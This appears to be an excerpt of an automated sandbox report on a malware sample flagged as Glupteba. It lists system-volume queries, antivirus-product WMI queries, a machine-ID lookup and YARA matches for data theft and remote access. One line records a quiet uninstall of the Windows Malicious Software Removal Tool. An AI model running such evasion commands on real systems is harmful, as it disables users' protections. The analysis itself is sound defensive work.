                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWndSVW
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                        Source: C:\Users\user\Desktop\25C1.exeQueries volume information: C:\Users\user\Desktop\25C1.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403532
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
